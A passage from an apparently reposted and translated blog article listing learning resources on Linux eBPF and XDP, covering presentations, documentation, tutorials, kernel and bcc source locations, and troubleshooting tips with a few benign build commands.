(“classic” BPF). New features such as maps and tail calls appeared. The JIT machines were rewritten. The new language is even closer to native machine language than cBPF was. And also, new attach points in the kernel have been created. + +Thanks to those new hooks, eBPF programs can be designed for a variety of use cases, that divide into two fields of applications. One of them is the domain of kernel tracing and event monitoring. BPF programs can be attached to kprobes and they compare with other tracing methods, with many advantages (and sometimes some drawbacks). + +The other application domain remains network programming. In addition to socket filter, eBPF programs can be attached to tc (Linux traffic control tool) ingress or egress interfaces and perform a variety of packet processing tasks, in an efficient way. This opens new perspectives in the domain. + +And eBPF performances are further leveraged through the technologies developed for the IO Visor project: new hooks have also been added for XDP (“eXpress Data Path”), a new fast path recently added to the kernel. XDP works in conjunction with the Linux stack, and relies on BPF to perform very fast packet processing. + +Even some projects such as P4, Open vSwitch, [consider][155] or started to approach BPF. Some others, such as CETH, Cilium, are entirely based on it. BPF is buzzing, so we can expect a lot of tools and projects to orbit around it soon… + +# Dive into the bytecode + +As for me: some of my work (including for [BEBA][156]) is closely related to eBPF, and several future articles on this site will focus on this topic. Logically, I wanted to somehow introduce BPF on this blog before going down to the details—I mean, a real introduction, more developed on BPF functionalities that the brief abstract provided in first section: What are BPF maps? Tail calls? What do the internals look like? And so on. But there are a lot of presentations on this topic available on the web already, and I do not wish to create “yet another BPF introduction” that would come as a duplicate of existing documents. + +So instead, here is what we will do. After all, I spent some time reading and learning about BPF, and while doing so, I gathered a fair amount of material about BPF: introductions, documentation, but also tutorials or examples. There is a lot to read, but in order to read it, one has to  _find_  it first. Therefore, as an attempt to help people who wish to learn and use BPF, the present article introduces a list of resources. These are various kinds of readings, that hopefully will help you dive into the mechanics of this kernel bytecode. + +# Resources + +![](https://qmonnet.github.io/whirl-offload/img/icons/pic.svg) + +### Generic presentations + +The documents linked below provide a generic overview of BPF, or of some closely related topics. If you are very new to BPF, you can try picking a couple of presentation among the first ones and reading the ones you like most. If you know eBPF already, you probably want to target specific topics instead, lower down in the list. + +### About BPF + +Generic presentations about eBPF: + +* [_Making the Kernel’s Networking Data Path Programmable with BPF and XDP_][53]  (Daniel Borkmann, OSSNA17, Los Angeles, September 2017): + One of the best set of slides available to understand quickly all the basics about eBPF and XDP (mostly for network processing). + +* [The BSD Packet Filter][54] (Suchakra Sharma, June 2017):  + A very nice introduction, mostly about the tracing aspects. + +* [_BPF: tracing and more_][55]  (Brendan Gregg, January 2017): + Mostly about the tracing use cases. + +* [_Linux BPF Superpowers_][56]  (Brendan Gregg, March 2016): + With a first part on the use of **flame graphs**. + +* [_IO Visor_][57]  (Brenden Blanco, SCaLE 14x, January 2016): + Also introduces **IO Visor project**. + +* [_eBPF on the Mainframe_][58]  (Michael Holzheu, LinuxCon, Dubin, October 2015) + +* [_New (and Exciting!) Developments in Linux Tracing_][59]  (Elena Zannoni, LinuxCon, Japan, 2015) + +* [_BPF — in-kernel virtual machine_][60]  (Alexei Starovoitov, February 2015): + Presentation by the author of eBPF. + +* [_Extending extended BPF_][61]  (Jonathan Corbet, July 2014) + +**BPF internals**: + +* Daniel Borkmann has been doing an amazing work to present **the internals** of eBPF, in particular about **its use with tc**, through several talks and papers. + * [_Advanced programmability and recent updates with tc’s cls_bpf_][30]  (netdev 1.2, Tokyo, October 2016): + Daniel provides details on eBPF, its use for tunneling and encapsulation, direct packet access, and other features. + + * [_cls_bpf/eBPF updates since netdev 1.1_][31]  (netdev 1.2, Tokyo, October 2016, part of [this tc workshop][32]) + + * [_On getting tc classifier fully programmable with cls_bpf_][33]  (netdev 1.1, Sevilla, February 2016): + After introducing eBPF, this presentation provides insights on many internal BPF mechanisms (map management, tail calls, verifier). A must-read! For the most ambitious, [the full paper is available here][34]. + + * [_Linux tc and eBPF_][35]  (fosdem16, Brussels, Belgium, January 2016) + + * [_eBPF and XDP walkthrough and recent updates_][36]  (fosdem17, Brussels, Belgium, February 2017) + + These presentations are probably one of the best sources of documentation to understand the design and implementation of internal mechanisms of eBPF. + +The [**IO Visor blog**][157] has some interesting technical articles about BPF. Some of them contain a bit of marketing talks. + +**Kernel tracing**: summing up all existing methods, including BPF: + +* [_Meet-cute between eBPF and Kerne Tracing_][62]  (Viller Hsiao, July 2016): + Kprobes, uprobes, ftrace + +* [_Linux Kernel Tracing_][63]  (Viller Hsiao, July 2016): + Systemtap, Kernelshark, trace-cmd, LTTng, perf-tool, ftrace, hist-trigger, perf, function tracer, tracepoint, kprobe/uprobe… + +Regarding **event tracing and monitoring**, Brendan Gregg uses eBPF a lot and does an excellent job at documenting some of his use cases. If you are in kernel tracing, you should see his blog articles related to eBPF or to flame graphs. Most of it are accessible [from this article][158] or by browsing his blog. + +Introducing BPF, but also presenting **generic concepts of Linux networking**: + +* [_Linux Networking Explained_][64]  (Thomas Graf, LinuxCon, Toronto, August 2016) + +* [_Kernel Networking Walkthrough_][65]  (Thomas Graf, LinuxCon, Seattle, August 2015) + +**Hardware offload**: + +* eBPF with tc or XDP supports hardware offload, starting with Linux kernel version 4.9 and introduced by Netronome. Here is a presentation about this feature: + [eBPF/XDP hardware offload to SmartNICs][147] (Jakub Kicinski and Nic Viljoen, netdev 1.2, Tokyo, October 2016) + +About **cBPF**: + +* [_The BSD Packet Filter: A New Architecture for User-level Packet Capture_][66]  (Steven McCanne and Van Jacobson, 1992): + The original paper about (classic) BPF. + +* [The FreeBSD manual page about BPF][67] is a useful resource to understand cBPF programs. + +* Daniel Borkmann realized at least two presentations on cBPF, [one in 2013 on mmap, BPF and Netsniff-NG][68], and [a very complete one in 2014 on tc and cls_bpf][69]. + +* On Cloudflare’s blog, Marek Majkowski presented his [use of BPF bytecode with the `xt_bpf`module for **iptables**][70]. It is worth mentioning that eBPF is also supported by this module, starting with Linux kernel 4.10 (I do not know of any talk or article about this, though). + +* [Libpcap filters syntax][71] + +### About XDP + +* [XDP overview][72] on the IO Visor website. + +* [_eXpress Data Path (XDP)_][73]  (Tom Herbert, Alexei Starovoitov, March 2016): + The first presentation about XDP. + +* [_BoF - What Can BPF Do For You?_][74]  (Brenden Blanco, LinuxCon, Toronto, August 2016). + +* [_eXpress Data Path_][148]  (Brenden Blanco, Linux Meetup at Santa Clara, July 2016): + Contains some (somewhat marketing?) **benchmark results**! With a single core: + * ip routing drop: ~3.6 million packets per second (Mpps) + + * tc (with clsact qdisc) drop using BPF: ~4.2 Mpps + + * XDP drop using BPF: 20 Mpps (<10 % CPU utilization) + + * XDP forward (on port on which the packet was received) with rewrite: 10 Mpps + + (Tests performed with the mlx4 driver). + +* Jesper Dangaard Brouer has several excellent sets of slides, that are essential to fully understand the internals of XDP. + * [_XDP − eXpress Data Path, Intro and future use-cases_][37]  (September 2016): + _“Linux Kernel’s fight against DPDK”_ . **Future plans** (as of this writing) for XDP and comparison with DPDK. + + * [_Network Performance Workshop_][38]  (netdev 1.2, Tokyo, October 2016): + Additional hints about XDP internals and expected evolution. + + * [_XDP – eXpress Data Path, Used for DDoS protection_][39]  (OpenSourceDays, March 2017): + Contains details and use cases about XDP, with **benchmark results**, and **code snippets** for **benchmarking** as well as for **basic DDoS protection** with eBPF/XDP (based on an IP blacklisting scheme). + + * [_Memory vs. Networking, Provoking and fixing memory bottlenecks_][40]  (LSF Memory Management Summit, March 2017): + Provides a lot of details about current **memory issues** faced by XDP developers. Do not start with this one, but if you already know XDP and want to see how it really works on the page allocation side, this is a very helpful resource. + + * [_XDP for the Rest of Us_][41]  (netdev 2.1, Montreal, April 2017), with Andy Gospodarek: + How to get started with eBPF and XDP for normal humans. This presentation was also summarized by Julia Evans on [her blog][42]. + + (Jesper also created and tries to extend some documentation about eBPF and XDP, see [related section][75].) + +* [_XDP workshop — Introduction, experience, and future development_][76]  (Tom Herbert, netdev 1.2, Tokyo, October 2016) — as of this writing, only the video is available, I don’t know if the slides will be added. + +* [_High Speed Packet Filtering on Linux_][149]  (Gilberto Bertin, DEF CON 25, Las Vegas, July 2017) — an excellent introduction to state-of-the-art packet filtering on Linux, oriented towards DDoS protection, talking about packet processing in the kernel, kernel bypass, XDP and eBPF. + +### About other components related or based on eBPF + +* [_P4 on the Edge_][77]  (John Fastabend, May 2016): + Presents the use of **P4**, a description language for packet processing, with BPF to create high-performance programmable switches. + +* If you like audio presentations, there is an associated [OvS Orbit episode (#11), called  _**P4** on the Edge_][78] , dating from August 2016\. OvS Orbit are interviews realized by Ben Pfaff, who is one of the core maintainers of Open vSwitch. In this case, John Fastabend is interviewed. + +* [_P4, EBPF and Linux TC Offload_][79]  (Dinan Gunawardena and Jakub Kicinski, August 2016): + Another presentation on **P4**, with some elements related to eBPF hardware offload on Netronome’s **NFP** (Network Flow Processor) architecture. + +* **Cilium** is a technology initiated by Cisco and relying on BPF and XDP to provide “fast in-kernel networking and security policy enforcement for containers based on eBPF programs generated on the fly”. [The code of this project][150] is available on GitHub. Thomas Graf has been performing a number of presentations of this topic: + * [_Cilium: Networking & Security for Containers with BPF & XDP_][43] , also featuring a load balancer use case (Linux Plumbers conference, Santa Fe, November 2016) + + * [_Cilium: Networking & Security for Containers with BPF & XDP_][44]  (Docker Distributed Systems Summit, October 2016 — [video][45]) + + * [_Cilium: Fast IPv6 container Networking with BPF and XDP_][46]  (LinuxCon, Toronto, August 2016) + + * [_Cilium: BPF & XDP for containers_][47]  (fosdem17, Brussels, Belgium, February 2017) + + A good deal of contents is repeated between the different presentations; if in doubt, just pick the most recent one. Daniel Borkmann has also written [a generic introduction to Cilium][80] as a guest author on Google Open Source blog. + +* There are also podcasts about **Cilium**: an [OvS Orbit episode (#4)][81], in which Ben Pfaff interviews Thomas Graf (May 2016), and [another podcast by Ivan Pepelnjak][82], still with Thomas Graf about eBPF, P4, XDP and Cilium (October 2016). + +* **Open vSwitch** (OvS), and its related project **Open Virtual Network** (OVN, an open source network virtualization solution) are considering to use eBPF at various level, with several proof-of-concept prototypes already implemented: + + * [Offloading OVS Flow Processing using eBPF][48] (William (Cheng-Chun) Tu, OvS conference, San Jose, November 2016) + + * [Coupling the Flexibility of OVN with the Efficiency of IOVisor][49] (Fulvio Risso, Matteo Bertrone and Mauricio Vasquez Bernal, OvS conference, San Jose, November 2016) + + These use cases for eBPF seem to be only at the stage of proposals (nothing merge to OvS main branch) as far as I know, but it will be very interesting to see what comes out of it. + +* XDP is envisioned to be of great help for protection against Distributed Denial-of-Service (DDoS) attacks. More and more presentations focus on this. For example, the talks from people from Cloudflare ( [_XDP in practice: integrating XDP in our DDoS mitigation pipeline_][83] ) or from Facebook ( [_Droplet: DDoS countermeasures powered by BPF + XDP_][84] ) at the netdev 2.1 conference in Montreal, Canada, in April 2017, present such use cases. + +* [_CETH for XDP_][85]  (Yan Chan and Yunsong Lu, Linux Meetup, Santa Clara, July 2016): + **CETH** stands for Common Ethernet Driver Framework for faster network I/O, a technology initiated by Mellanox. + +* [**The VALE switch**][86], another virtual switch that can be used in conjunction with the netmap framework, has [a BPF extension module][87]. + +* **Suricata**, an open source intrusion detection system, [seems to rely on eBPF components][88] for its “capture bypass” features: + [_The adventures of a Suricate in eBPF land_][89]  (Éric Leblond, netdev 1.2, Tokyo, October 2016) + [_eBPF and XDP seen from the eyes of a meerkat_][90]  (Éric Leblond, Kernel Recipes, Paris, September 2017) + +* [InKeV: In-Kernel Distributed Network Virtualization for DCN][91] (Z. Ahmed, M. H. Alizai and A. A. Syed, SIGCOMM, August 2016): + **InKeV** is an eBPF-based datapath architecture for virtual networks, targeting data center networks. It was initiated by PLUMgrid, and claims to achieve better performances than OvS-based OpenStack solutions. + +* [_**gobpf** - utilizing eBPF from Go_][92]  (Michael Schubert, fosdem17, Brussels, Belgium, February 2017): + A “library to create, load and use eBPF programs from Go” + +* [**ply**][93] is a small but flexible open source dynamic **tracer** for Linux, with some features similar to the bcc tools, but with a simpler language inspired by awk and dtrace, written by Tobias Waldekranz. + +* If you read my previous article, you might be interested in this talk I gave about [implementing the OpenState interface with eBPF][151], for stateful packet processing, at fosdem17. + +![](https://qmonnet.github.io/whirl-offload/img/icons/book.svg) + +### Documentation + +Once you managed to get a broad idea of what BPF is, you can put aside generic presentations and start diving into the documentation. Below are the most complete documents about BPF specifications and functioning. Pick the one you need and read them carefully! + +### About BPF + +* The **specification of BPF** (both classic and extended versions) can be found within the documentation of the Linux kernel, and in particular in file[linux/Documentation/networking/filter.txt][94]. The use of BPF as well as its internals are documented there. Also, this is where you can find **information about errors thrown by the verifier** when loading BPF code fails. Can be helpful to troubleshoot obscure error messages. + +* Also in the kernel tree, there is a document about **frequent Questions & Answers** on eBPF design in file [linux/Documentation/bpf/bpf_design_QA.txt][95]. + +* … But the kernel documentation is dense and not especially easy to read. If you look for a simple description of eBPF language, head for [its **summarized description**][96] on the IO Visor GitHub repository instead. + +* By the way, the IO Visor project gathered a lot of **resources about BPF**. Mostly, it is split between[the documentation directory][97] of its bcc repository, and the whole content of [the bpf-docs repository][98], both on GitHub. Note the existence of this excellent [BPF **reference guide**][99] containing a detailed description of BPF C and bcc Python helpers. + +* To hack with BPF, there are some essential **Linux manual pages**. The first one is [the `bpf(2)` man page][100] about the `bpf()` **system call**, which is used to manage BPF programs and maps from userspace. It also contains a description of BPF advanced features (program types, maps and so on). The second one is mostly addressed to people wanting to attach BPF programs to tc interface: it is [the `tc-bpf(8)` man page][101], which is a reference for **using BPF with tc**, and includes some example commands and samples of code. + +* Jesper Dangaard Brouer initiated an attempt to **update eBPF Linux documentation**, including **the different kinds of maps**. [He has a draft][102] to which contributions are welcome. Once ready, this document should be merged into the man pages and into kernel documentation. + +* The Cilium project also has an excellent [**BPF and XDP Reference Guide**][103], written by core eBPF developers, that should prove immensely useful to any eBPF developer. + +* David Miller has sent several enlightening emails about eBPF/XDP internals on the [xdp-newbies][152]mailing list. I could not find a link that gathers them at a single place, so here is a list: + * [bpf.h and you…][50] + + * [Contextually speaking…][51] + + * [BPF Verifier Overview][52] + + The last one is possibly the best existing summary about the verifier at this date. + +* Ferris Ellis started [a **blog post series about eBPF**][104]. As I write this paragraph, the first article is out, with some historical background and future expectations for eBPF. Next posts should be more technical, and look promising. + +* [A **list of BPF features per kernel version**][153] is available in bcc repository. Useful is you want to know the minimal kernel version that is required to run a given feature. I contributed and added the links to the commits that introduced each feature, so you can also easily access the commit logs from there. + +### About tc + +When using BPF for networking purposes in conjunction with tc, the Linux tool for **t**raffic **c**ontrol, one may wish to gather information about tc’s generic functioning. Here are a couple of resources about it. + +* It is difficult to find simple tutorials about **QoS on Linux**. The two links I have are long and quite dense, but if you can find the time to read it you will learn nearly everything there is to know about tc (nothing about BPF, though). There they are:  [_Traffic Control HOWTO_  (Martin A. Brown, 2006)][105], and the  [_Linux Advanced Routing & Traffic Control HOWTO_  (“LARTC”) (Bert Hubert & al., 2002)][106]. + +* **tc manual pages** may not be up-to-date on your system, since several of them have been added lately. If you cannot find the documentation for a particular queuing discipline (qdisc), class or filter, it may be worth checking the latest [manual pages for tc components][107]. + +* Some additional material can be found within the files of iproute2 package itself: the package contains [some documentation][108], including some files that helped me understand better [the functioning of **tc’s actions**][109]. + **Edit:** While still available from the Git history, these files have been deleted from iproute2 in October 2017. + +* Not exactly documentation: there was [a workshop about several tc features][110] (including filtering, BPF, tc offload, …) organized by Jamal Hadi Salim during the netdev 1.2 conference (October 2016). + +* Bonus information—If you use `tc` a lot, here are some good news: I [wrote a bash completion function][111] for this tool, and it should be shipped with package iproute2 coming with kernel version 4.6 and higher! + +### About XDP + +* Some [work-in-progress documentation (including specifications)][112] for XDP started by Jesper Dangaard Brouer, but meant to be a collaborative work. Under progress (September 2016): you should expect it to change, and maybe to be moved at some point (Jesper [called for contribution][113], if you feel like improving it). + +* The [BPF and XDP Reference Guide][114] from Cilium project… Well, the name says it all. + +### About P4 and BPF + +[P4][159] is a language used to specify the behavior of a switch. It can be compiled for a number of hardware or software targets. As you may have guessed, one of these targets is BPF… The support is only partial: some P4 features cannot be translated towards BPF, and in a similar way there are things that BPF can do but that would not be possible to express with P4\. Anyway, the documentation related to **P4 use with BPF** [used to be hidden in bcc repository][160]. This changed with P4_16 version, the p4c reference compiler including [a backend for eBPF][161]. + +![](https://qmonnet.github.io/whirl-offload/img/icons/flask.svg) + +### Tutorials + +Brendan Gregg has produced excellent **tutorials** intended for people who want to **use bcc tools** for tracing and monitoring events in the kernel. [The first tutorial about using bcc itself][162] comes with eleven steps (as of today) to understand how to use the existing tools, while [the one **intended for Python developers**][163] focuses on developing new tools, across seventeen “lessons”. + +Sasha Goldshtein also has some  [_**Linux Tracing Workshops Materials**_][164]  involving the use of several BPF tools for tracing. + +Another post by Jean-Tiare Le Bigot provides a detailed (and instructive!) example of [using perf and eBPF to setup a low-level tracer][165] for ping requests and replies + +Few tutorials exist for network-related eBPF use cases. There are some interesting documents, including an  _eBPF Offload Starting Guide_ , on the [Open NFP][166] platform operated by Netronome. Other than these, the talk from Jesper,  [_XDP for the Rest of Us_][167] , is probably one of the best ways to get started with XDP. + +![](https://qmonnet.github.io/whirl-offload/img/icons/gears.svg) + +### Examples + +It is always nice to have examples. To see how things really work. But BPF program samples are scattered across several projects, so I listed all the ones I know of. The examples do not always use the same helpers (for instance, tc and bcc both have their own set of helpers to make it easier to write BPF programs in C language). + +### From the kernel + +The kernel contains examples for most types of program: filters to bind to sockets or to tc interfaces, event tracing/monitoring, and even XDP. You can find these examples under the [linux/samples/bpf/][168]directory. + +Also do not forget to have a look to the logs related to the (git) commits that introduced a particular feature, they may contain some detailed example of the feature. + +### From package iproute2 + +The iproute2 package provide several examples as well. They are obviously oriented towards network programming, since the programs are to be attached to tc ingress or egress interfaces. The examples dwell under the [iproute2/examples/bpf/][169] directory. + +### From bcc set of tools + +Many examples are [provided with bcc][170]: + +* Some are networking example programs, under the associated directory. They include socket filters, tc filters, and a XDP program. + +* The `tracing` directory include a lot of example **tracing programs**. The tutorials mentioned earlier are based on these. These programs cover a wide range of event monitoring functions, and some of them are production-oriented. Note that on certain Linux distributions (at least for Debian, Ubuntu, Fedora, Arch Linux), these programs have been [packaged][115] and can be “easily” installed by typing e.g. `# apt install bcc-tools`, but as of this writing (and except for Arch Linux), this first requires to set up IO Visor’s own package repository. + +* There are also some examples **using Lua** as a different BPF back-end (that is, BPF programs are written with Lua instead of a subset of C, allowing to use the same language for front-end and back-end), in the third directory. + +### Manual pages + +While bcc is generally the easiest way to inject and run a BPF program in the kernel, attaching programs to tc interfaces can also be performed by the `tc` tool itself. So if you intend to **use BPF with tc**, you can find some example invocations in the [`tc-bpf(8)` manual page][171]. + +![](https://qmonnet.github.io/whirl-offload/img/icons/srcfile.svg) + +### The code + +Sometimes, BPF documentation or examples are not enough, and you may have no other solution that to display the code in your favorite text editor (which should be Vim of course) and to read it. Or you may want to hack into the code so as to patch or add features to the machine. So here are a few pointers to the relevant files, finding the functions you want is up to you! + +### BPF code in the kernel + +* The file [linux/include/linux/bpf.h][116] and its counterpart [linux/include/uapi/bpf.h][117] contain **definitions** related to eBPF, to be used respectively in the kernel and to interface with userspace programs. + +* On the same pattern, files [linux/include/linux/filter.h][118] and [linux/include/uapi/filter.h][119] contain information used to **run the BPF programs**. + +* The **main pieces of code** related to BPF are under [linux/kernel/bpf/][120] directory. **The different operations permitted by the system call**, such as program loading or map management, are implemented in file `syscall.c`, while `core.c` contains the **interpreter**. The other files have self-explanatory names: `verifier.c` contains the **verifier** (no kidding), `arraymap.c` the code used to interact with **maps** of type array, and so on. + +* The **helpers**, as well as several functions related to networking (with tc, XDP…) and available to the user, are implemented in [linux/net/core/filter.c][121]. It also contains the code to migrate cBPF bytecode to eBPF (since all cBPF programs are now translated to eBPF in the kernel before being run). + +* The **JIT compilers** are under the directory of their respective architectures, such as file[linux/arch/x86/net/bpf_jit_comp.c][122] for x86. + +* You will find the code related to **the BPF components of tc** in the [linux/net/sched/][123] directory, and in particular in files `act_bpf.c` (action) and `cls_bpf.c` (filter). + +* I have not hacked with **event tracing** in BPF, so I do not really know about the hooks for such programs. There is some stuff in [linux/kernel/trace/bpf_trace.c][124]. If you are interested in this and want to know more, you may dig on the side of Brendan Gregg’s presentations or blog posts. + +* Nor have I used **seccomp-BPF**. But the code is in [linux/kernel/seccomp.c][125], and some example use cases can be found in [linux/tools/testing/selftests/seccomp/seccomp_bpf.c][126]. + +### XDP hooks code + +Once loaded into the in-kernel BPF virtual machine, **XDP** programs are hooked from userspace into the kernel network path thanks to a Netlink command. On reception, the function `dev_change_xdp_fd()` in file [linux/net/core/dev.c][172] is called and sets a XDP hook. Such hooks are located in the drivers of supported NICs. For example, the mlx4 driver used for some Mellanox hardware has hooks implemented in files under the [drivers/net/ethernet/mellanox/mlx4/][173] directory. File en_netdev.c receives Netlink commands and calls `mlx4_xdp_set()`, which in turns calls for instance `mlx4_en_process_rx_cq()` (for the RX side) implemented in file en_rx.c. + +### BPF logic in bcc + +One can find the code for the **bcc** set of tools [on the bcc GitHub repository][174]. The **Python code**, including the `BPF` class, is initiated in file [bcc/src/python/bcc/__init__.py][175]. But most of the interesting stuff—to my opinion—such as loading the BPF program into the kernel, happens [in the libbcc **C library**][176]. + +### Code to manage BPF with tc + +The code related to BPF **in tc** comes with the iproute2 package, of course. Some of it is under the[iproute2/tc/][177] directory. The files f_bpf.c and m_bpf.c (and e_bpf.c) are used respectively to handle BPF filters and actions (and tc `exec` command, whatever this may be). File q_clsact.c defines the `clsact` qdisc especially created for BPF. But **most of the BPF userspace logic** is implemented in[iproute2/lib/bpf.c][178] library, so this is probably where you should head to if you want to mess up with BPF and tc (it was moved from file iproute2/tc/tc_bpf.c, where you may find the same code in older versions of the package). + +### BPF utilities + +The kernel also ships the sources of three tools (`bpf_asm.c`, `bpf_dbg.c`, `bpf_jit_disasm.c`) related to BPF, under the [linux/tools/net/][179] or [linux/tools/bpf/][180] directory depending on your version: + +* `bpf_asm` is a minimal cBPF assembler. + +* `bpf_dbg` is a small debugger for cBPF programs. + +* `bpf_jit_disasm` is generic for both BPF flavors and could be highly useful for JIT debugging. + +* `bpftool` is a generic utility written by Jakub Kicinski, and that can be used to interact with eBPF programs and maps from userspace, for example to show, dump, pin programs, or to show, create, pin, update, delete maps. + +Read the comments at the top of the source files to get an overview of their usage. + +### Other interesting chunks + +If you are interested the use of less common languages with BPF, bcc contains [a **P4 compiler** for BPF targets][181] as well as [a **Lua front-end**][182] that can be used as alternatives to the C subset and (in the case of Lua) to the Python tools. + +### LLVM backend + +The BPF backend used by clang / LLVM for compiling C into eBPF was added to the LLVM sources in[this commit][183] (and can also be accessed on [the GitHub mirror][184]). + +### Running in userspace + +As far as I know there are at least two eBPF userspace implementations. The first one, [uBPF][185], is written in C. It contains an interpreter, a JIT compiler for x86_64 architecture, an assembler and a disassembler. + +The code of uBPF seems to have been reused to produce a [generic implementation][186], that claims to support FreeBSD kernel, FreeBSD userspace, Linux kernel, Linux userspace and MacOSX userspace. It is used for the [BPF extension module for VALE switch][187]. + +The other userspace implementation is my own work: [rbpf][188], based on uBPF, but written in Rust. The interpreter and JIT-compiler work (both under Linux, only the interpreter for MacOSX and Windows), there may be more in the future. + +### Commit logs + +As stated earlier, do not hesitate to have a look at the commit log that introduced a particular BPF feature if you want to have more information about it. You can search the logs in many places, such as on [git.kernel.org][189], [on GitHub][190], or on your local repository if you have cloned it. If you are not familiar with git, try things like `git blame ` to see what commit introduced a particular line of code, then `git show ` to have details (or search by keyword in `git log` results, but this may be tedious). See also [the list of eBPF features per kernel version][191] on bcc repository, that links to relevant commits. + +![](https://qmonnet.github.io/whirl-offload/img/icons/wand.svg) + +### Troubleshooting + +The enthusiasm about eBPF is quite recent, and so far I have not found a lot of resources intending to help with troubleshooting. So here are the few I have, augmented with my own recollection of pitfalls encountered while working with BPF. + +### Errors at compilation time + +* Make sure you have a recent enough version of the Linux kernel (see also [this document][127]). + +* If you compiled the kernel yourself: make sure you installed correctly all components, including kernel image, headers and libc. + +* When using the `bcc` shell function provided by `tc-bpf` man page (to compile C code into BPF): I once had to add includes to the header for the clang call: + + ``` + __bcc() { + clang -O2 -I "/usr/src/linux-headers-$(uname -r)/include/" \ + -I "/usr/src/linux-headers-$(uname -r)/arch/x86/include/" \ + -emit-llvm -c $1 -o - | \ + llc -march=bpf -filetype=obj -o "`basename $1 .c`.o" + } + + ``` + + (seems fixed as of today). + +* For other problems with `bcc`, do not forget to have a look at [the FAQ][128] of the tool set. + +* If you downloaded the examples from the iproute2 package in a version that does not exactly match your kernel, some errors can be triggered by the headers included in the files. The example snippets indeed assume that the same version of iproute2 package and kernel headers are installed on the system. If this is not the case, download the correct version of iproute2, or edit the path of included files in the examples to point to the headers included in iproute2 (some problems may or may not occur at runtime, depending on the features in use). + +### Errors at load and run time + +* To load a program with tc, make sure you use a tc binary coming from an iproute2 version equivalent to the kernel in use. + +* To load a program with bcc, make sure you have bcc installed on the system (just downloading the sources to run the Python script is not enough). + +* With tc, if the BPF program does not return the expected values, check that you called it in the correct fashion: filter, or action, or filter with “direct-action” mode. + +* With tc still, note that actions cannot be attached directly to qdiscs or interfaces without the use of a filter. + +* The errors thrown by the in-kernel verifier may be hard to interpret. [The kernel documentation][129]may help, so may [the reference guide][130] or, as a last resort, the source code (see above) (good luck!). For this kind of errors it is also important to keep in mind that the verifier  _does not run_  the program. If you get an error about an invalid memory access or about uninitialized data, it does not mean that these problems actually occurred (or sometimes, that they can possibly occur at all). It means that your program is written in such a way that the verifier estimates that such errors could happen, and therefore it rejects the program. + +* Note that `tc` tool has a verbose mode, and that it works well with BPF: try appending `verbose`at the end of your command line. + +* bcc also has verbose options: the `BPF` class has a `debug` argument that can take any combination of the three flags `DEBUG_LLVM_IR`, `DEBUG_BPF` and `DEBUG_PREPROCESSOR` (see details in [the source file][131]). It even embeds [some facilities to print output messages][132] for debugging the code. + +* LLVM v4.0+ [embeds a disassembler][133] for eBPF programs. So if you compile your program with clang, adding the `-g` flag for compiling enables you to later dump your program in the rather human-friendly format used by the kernel verifier. To proceed to the dump, use: + + ``` + $ llvm-objdump -S -no-show-raw-insn bpf_program.o + + ``` + +* Working with maps? You want to have a look at [bpf-map][134], a very userful tool in Go created for the Cilium project, that can be used to dump the contents of kernel eBPF maps. There also exists [a clone][135] in Rust. + +* There is an old [`bpf` tag on **StackOverflow**][136], but as of this writing it has been hardly used—ever (and there is nearly nothing related to the new eBPF version). If you are a reader from the Future though, you may want to check whether there has been more activity on this side. + +![](https://qmonnet.github.io/whirl-offload/img/icons/zoomin.svg) + +### And still more! + +* In case you would like to easily **test XDP**, there is [a Vagrant setup][137] available. You can also **test bcc**[in a Docker container][138]. + +* Wondering where the **development and activities** around BPF occur? Well, the kernel patches always end up [on the netdev mailing list][139] (related to the Linux kernel networking stack development): search for “BPF” or “XDP” keywords. Since April 2017, there is also [a mailing list specially dedicated to XDP programming][140] (both for architecture or for asking for help). Many discussions and debates also occur [on the IO Visor mailing list][141], since BPF is at the heart of the project. If you only want to keep informed from time to time, there is also an [@IOVisor Twitter account][142]. + +And come back on this blog from time to time to see if they are new articles [about BPF][192]! + + _Special thanks to Daniel Borkmann for the numerous [additional documents][154] he pointed to me so that I could complete this collection._ + +-------------------------------------------------------------------------------- + +via: https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/ + +作者:[Quentin Monnet ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://qmonnet.github.io/whirl-offload/about/ +[1]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-bpf +[2]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-xdp +[3]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-other-components-related-or-based-on-ebpf +[4]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-bpf-1 +[5]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-tc +[6]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-xdp-1 +[7]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-p4-and-bpf +[8]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#from-the-kernel +[9]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#from-package-iproute2 +[10]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#from-bcc-set-of-tools +[11]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#manual-pages +[12]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#bpf-code-in-the-kernel +[13]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#xdp-hooks-code +[14]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#bpf-logic-in-bcc +[15]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#code-to-manage-bpf-with-tc +[16]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#bpf-utilities +[17]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#other-interesting-chunks +[18]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#llvm-backend +[19]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#running-in-userspace +[20]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#commit-logs +[21]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#errors-at-compilation-time +[22]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#errors-at-load-and-run-time +[23]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#generic-presentations 